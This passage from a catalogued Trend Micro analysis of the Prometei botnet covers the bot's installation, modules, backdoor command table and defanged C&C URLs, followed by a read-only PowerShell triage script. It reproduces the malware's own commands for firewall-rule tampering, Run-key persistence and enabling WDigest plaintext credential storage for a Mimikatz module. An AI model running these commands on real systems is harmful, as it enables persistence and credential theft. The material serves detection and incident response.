HTTP\r\nC:\\Windows\\System32\\cmd.exe /C netsh advfirewall firewall add rule name=\"Secure\r\nSocket Tunneling Protocol (HTTP)\" dir=in action=allow\r\nprogram=\"c:\\windows\\sqhost.exe\" enable=yes\u0026netsh firewall add allowedprogram\r\nc:\\windows\\sqhost.exe \"Secure Socket Tunneling Protocol (HTTP)\" ENABLE\r\nIf installing itself without admin 
rights, it will instead do the following:\r\nQuery the service UPlugPlay\r\nCopy self and rename as sqhost to %AppData%\\intel\\roaming folder:\r\n\"C:\\Windows\\System32\\cmd.exe\" /C copy /y \"{Malware Folder}\\zsvc.exe\"\r\n\"%AppData%\\intel\\sqhost.exe\"\r\nAdd itself to the current user CurrentVersion\\Run autostart key for persistence.\r\n\"C:\\Windows\\System32\\cmd.exe\" /C reg add\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v UPlugPlay /t REG_SZ /d\r\n\"c:\\users\\dyituser_764\\appdata\\roaming\\intel\\sqhost.exe Dcomsvc\" /f\r\nExecute its copied self with the “Dcomsvc” parameter.\r\nIf it is finished with its installation routines it will proceed to terminate itself.\r\nsqhost.exe (As the main botnet binary)\r\nSince sqhost and zsvc are the same file, they also have the same way of packing (initially upx, then the custom\r\nunpacker).\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 14 of 18\n\nThe sample can check if it is run with a parameter. Some parameters it checks for include: ver, Dcomsvc, sha1chk\r\n{input}, and watchdog. Based on testing running the parameters don’t return a console output\r\nThe service created executes the sample with the parameter “Dcomsvc”\r\nThe sample appears to be version 3.22 of the botnet.\r\nExecution chain\r\nThe sample will execute itself with the watchdog parameter. 
The watchdog ensures that only one instance of the service is running.\r\nThe sample then executes the following commands, which delete a firewall rule named “Banned brute IPs” and enable failure auditing for the Logon subcategory (a change to audit policy through auditpol is itself worth alerting on):\r\n\"C:\\Windows\\System32\\cmd.exe\" /C netsh advfirewall firewall delete rule name=\"Banned brute IPs\"\r\n\"C:\\Windows\\System32\\cmd.exe\" /C Auditpol /set /subcategory:\"Logon\" /failure:enable\r\nThe sample then attempts to execute its downloaded modules:\r\n\"C:\\Windows\\System32\\cmd.exe\" /C rdpclIp.exe\r\n\"C:\\Windows\\System32\\cmd.exe\" /C netsync_v2.exe\r\n\"C:\\Windows\\System32\\cmd.exe\" /C nvstub_v2.exe\r\n\"C:\\Windows\\System32\\cmd.exe\" /C netdefender.exe\r\nIt runs the following reconnaissance commands:\r\nwmic baseboard get Manufacturer\r\nwmic baseboard get product\r\nwmic ComputerSystem get Model\r\ncmd.exe /c ver\r\nwmic OS get lastbootuptime\r\nwmic os get caption\r\nThe sample then begins attempting to connect to its C\u0026C; once a connection succeeds, it waits for commands.\r\nFour C\u0026C URLs from which the bot can obtain its configuration are hardcoded in the binary, including I2P (.b32.i2p) and Tor (.onion) addresses:\r\nhttp[://]p2.feefreepool[.]net/cgi-bin/prometei.cgi\r\nhttp[://]mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq[.]zero/cgi-bin/prometei.cgi\r\nhttp[://]mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq[.]b32[.]i2p/cgi-bin/prometei.cgi\r\nhttps[://]gb7ni5rgeexdcncj[.]onion/cgi-bin/prometei.cgi\r\nBackdoor commands identified in the sample:\r\nCommand  Description\r\nset_cc1  Sets a C\u0026C server\r\nset_cc0  Sets a C\u0026C server\r\nset_autoexec2  Sets an automatic execution\r\nset_autoexec1  Sets an automatic execution\r\nset_timeout  Sets the interval for connecting to the C\u0026C server\r\nstart_mining  Launches SearchIndexer.exe (the miner)\r\nstart_mining1  Launches SearchIndexer.exe (the miner)\r\nstop_mining  Terminates SearchIndexer.exe\r\nquit  Terminates the bot\r\nquit2  Terminates the bot\r\nsysinfo  Collects information about the machine\r\ncall  Executes a program or a file\r\nwget  Downloads a file\r\nxwget  Downloads a file, saves it, and XOR-decrypts it\r\nexec  Executes a command\r\nupdate  Updates the bot version\r\ntouch  Opens a file\r\nchkport  Checks whether a specific port is open\r\nextip  Returns the bot's external IP address\r\nsearch  Searches for files by name\r\nfchk  Checks whether a file is locked by a process, and reports the file's owner\r\nfdir  Gets the current directory\r\nTable 1. Backdoor commands from the sample\r\nInformation Stolen\r\nThe sample runs the reconnaissance commands above to collect details about the system and motherboard, and its backdoor commands let the operator gather many other kinds of information on demand.\r\nrdpclIp.exe\\winhlpx64.exe\r\nThe botnet's main spreader module.\r\nExecuted by the main bot, sqhost.exe.\r\nExecutes the command \"C:\\Windows\\System32\\cmd.exe\" /C reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\" /v UseLogonCredential /f /t REG_DWORD /d 1 to enable its password-stealing module to harvest credentials. Setting UseLogonCredential to 1 makes the WDigest provider keep plaintext logon credentials in LSASS memory, which is what the Mimikatz-based module below reads; on Windows 8.1 and later the value does not exist by default, so its presence is a useful indicator on its own.\r\nmiwalk.exe\r\nThe botnet's customized Mimikatz module.\r\nExecuted by rdpclIp.exe. It works in tandem with its parent process to gather stolen credentials that can then be used for lateral movement.\r\nThe gathered credentials are stored in C:\\Windows\\dell\\slldata2.dll.\r\nwindrlver.exe\r\nThe botnet's SSH spreader module.\r\nExecuted by rdpclIp.exe, which determines the parameters it must be run with.\r\nSearchIndexer.exe\r\nThe botnet's mining payload.\r\nUses XMRig version 6.18.0.\r\nExecuted by sqhost.exe when the bot receives the “start_mining” or “start_mining1” command.\r\nFigure 20.\r\n
Code snippet showing the commands for the mining payload\r\nIdentifying the Threat Group\r\nThe threat actors behind Prometei remain largely unidentified, but the evidence suggests they are Russian speakers. The name \"Prometei\", the Russian form of Prometheus, hints at a cultural connection.\r\nOlder versions of the malware dating back to 2016 contained remnants of Russian language settings, such as an unedited \"product name\" in the main bot module and a language code indicating Russian.\r\nFurthermore, Prometei appears to avoid infecting other Russian speakers, as seen in the behavior of some of its modules. One notable feature is the integrated Tor client, which is used to reach a Tor C\u0026C server while avoiding certain exit nodes in the former Soviet Union. Another component, nvsync.exe, checks stolen credentials and deliberately skips accounts labeled “Guest” and “Other user” (in Russian), further suggesting a focus on specific targets.\r\nConclusion\r\nOur investigation into the Prometei attack reveals the botnet's complexity and persistence in compromised environments. Using WMI and lateral movement techniques, Prometei spreads rapidly by exploiting SMB and RDP vulnerabilities. Key components such as sqhost.exe and miwalk.exe handle credential harvesting and connections to the command-and-control servers. The presence of encoded payloads, Base64-obfuscated PowerShell commands, and firewall modifications underscores the attackers' efforts to evade detection and maintain persistence.\r\nIncorporating MXDR services into our investigation enhanced real-time monitoring and event correlation, improving the ability to detect and respond to malicious activity early in the attack lifecycle. By combining Incident Response, Threat Intelligence, and MXDR, we gained a comprehensive understanding of the Prometei botnet and its potential impact on the compromised network. This investigation highlights the importance of proactive detection and response, showing how the right solutions and intelligence (as facilitated by Trend Vision One) can reduce dwell time and protect against advanced threats.\r\nTrend Micro Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and be better prepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and respond effectively to threats.\r\nTrend Micro Vision One Intelligence Reports App [IOC Sweeping]\r\nUnmasking Prometei: A Deep Dive Into Our MXDR Findings\r\nTrend Micro Vision One Threat Insights App\r\nEmerging Threats: Unmasking Prometei: A Deep Dive Into Our MXDR Findings\r\nHunting Queries\r\nTrend Micro Vision One Search App\r\nTrend Micro Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post against data in their environment.
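\r\nHost triage for the artifacts described in the sections above: the installation routine (the UPlugPlay service, C:\\Windows\\sqhost.exe, the per-user %AppData%\\intel\\sqhost.exe copy and its Run value, and the values stored under the Fax registry key), the sqhost.exe firewall allow rule, the WDigest change made by rdpclIp.exe, and the slldata2.dll credential store written by miwalk.exe. This is an added example written for this page, not code from the original post or from Trend Micro. It only reads host state and lists what it finds; the finding record (Kind, Where, Detail) and the loop over every user profile are this example's own choices, while all artifact names and paths come from the analysis above.\r\n```powershell\r\n# Added example (not from the original post): read-only triage for the Prometei artifacts described above.\r\n# Run in an elevated session, since HKEY_USERS, the service key and other users' profiles need administrator rights.\r\n# Assumption: every name and path checked here is taken from the analysis on this page; nothing else is inferred.\r\n\r\nfunction Get-PrometeiFindings {\r\n    $findings = New-Object System.Collections.Generic.List[object]\r\n    function Add-Finding([string]$Kind, [string]$Where, [string]$Detail) {\r\n        $findings.Add([pscustomobject]@{ Kind = $Kind; Where = $Where; Detail = $Detail })\r\n    }\r\n\r\n    # 1. Service persistence: UPlugPlay with ImagePath c:\\windows\\sqhost.exe Dcomsvc.\r\n    $svcKey = 'HKLM:\\SYSTEM\\CurrentControlSet\\Services\\UPlugPlay'\r\n    if (Test-Path $svcKey) {\r\n        $img = (Get-ItemProperty -Path $svcKey -ErrorAction SilentlyContinue).ImagePath\r\n        Add-Finding 'Service' $svcKey ('ImagePath=' + $img)\r\n    }\r\n\r\n    # 2. Dropped binaries in the Windows root (zsvc.exe before the rename, sqhost.exe after) and the modules.\r\n    #    The legitimate SearchIndexer.exe lives in System32, so a copy in %SystemRoot% is the mining payload.\r\n    foreach ($f in 'zsvc.exe','sqhost.exe','rdpclIp.exe','winhlpx64.exe','miwalk.exe','windrlver.exe','SearchIndexer.exe') {\r\n        $p = Join-Path $env:SystemRoot $f\r\n        if (Test-Path $p) { Add-Finding 'File' $p ((Get-Item $p).Length.ToString() + ' bytes') }\r\n    }\r\n    $store = Join-Path $env:SystemRoot 'dell\\slldata2.dll'\r\n    if (Test-Path $store) { Add-Finding 'CredStore' $store 'miwalk.exe credential output' }\r\n\r\n    # 3. Non-admin fallback: %AppData%\\intel\\sqhost.exe plus a UPlugPlay Run value, checked for every profile.\r\n    foreach ($prof in Get-ChildItem (Join-Path $env:SystemDrive 'Users') -Directory -ErrorAction SilentlyContinue) {\r\n        $p = Join-Path $prof.FullName 'AppData\\Roaming\\intel\\sqhost.exe'\r\n        if (Test-Path $p) { Add-Finding 'File' $p 'user-mode copy' }\r\n    }\r\n    foreach ($hive in Get-ChildItem 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue) {\r\n        $run = 'Registry::HKEY_USERS\\' + $hive.PSChildName + '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'\r\n        $val = (Get-ItemProperty -Path $run -Name UPlugPlay -ErrorAction SilentlyContinue).UPlugPlay\r\n        if ($val) { Add-Finding 'RunKey' $run ('UPlugPlay=' + $val) }\r\n    }\r\n\r\n    # 4. Bot identity values that the installer stores under HKLM\\SOFTWARE\\Microsoft\\Fax.\r\n    $fax = 'HKLM:\\SOFTWARE\\Microsoft\\Fax'\r\n    if (Test-Path $fax) {\r\n        $props = Get-ItemProperty -Path $fax -ErrorAction SilentlyContinue\r\n        foreach ($n in 'CommId','MachineKeyId','EncryptedMachineKeyId') {\r\n            if ($null -ne $props.$n) { Add-Finding 'Registry' ($fax + '\\' + $n) ([string]$props.$n) }\r\n        }\r\n    }\r\n\r\n    # 5. WDigest UseLogonCredential=1 makes LSASS keep plaintext credentials for miwalk.exe to read.\r\n    $wd = 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'\r\n    $ulc = (Get-ItemProperty -Path $wd -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential\r\n    if ($ulc -eq 1) { Add-Finding 'Registry' ($wd + '\\UseLogonCredential') 'set to 1 (plaintext credentials in LSASS)' }\r\n\r\n    # 6. Firewall allow rule that borrows the SSTP name but is bound to sqhost.exe.\r\n    foreach ($r in Get-NetFirewallRule -DisplayName 'Secure Socket Tunneling Protocol (HTTP)' -ErrorAction SilentlyContinue) {\r\n        $prog = ($r | Get-NetFirewallApplicationFilter).Program\r\n        if ($prog -and $prog -match 'sqhost\\.exe$') { Add-Finding 'Firewall' $r.Name ('program=' + $prog) }\r\n    }\r\n\r\n    return ,$findings\r\n}\r\n\r\n$result = Get-PrometeiFindings\r\nif ($result.Count -eq 0) { 'No Prometei artifacts found on this host.' } else { $result | Format-Table -AutoSize }\r\n```\r\nRun it from an elevated PowerShell session on a host suspected of infection; it changes nothing. A UseLogonCredential hit is not conclusive by itself, since administrators and other tooling also set it, but together with the UPlugPlay service or Run value it is a strong indicator. The Fax key values should be preserved before remediation, since they are the identifiers the bot uses in its C\u0026C communication.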
\r\nDetection of PROMETEI Malware\r\nmalName:*PROMETEI* AND eventName:MALWARE_DETECTION\r\nMore hunting queries are available for Vision One customers with the Threat Insights entitlement enabled.\r\nIndicators of Compromise\r\nThe full list of IOCs is linked from the original post.\r\nFigure 5. 7z.exe file used to extract contents of updates1.7z and updates2.7z (miWalk64.exe, miWalk32.exe)\r\nSource: https://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html"
	],
	"report_names": [
		"unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434871,
	"ts_updated_at": 1775791857,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/127d85bb2f93bc1c23c229f18e99518932c70640.pdf",
		"text": "https://archive.orkl.eu/127d85bb2f93bc1c23c229f18e99518932c70640.txt",
		"img": "https://archive.orkl.eu/127d85bb2f93bc1c23c229f18e99518932c70640.jpg"
	}
}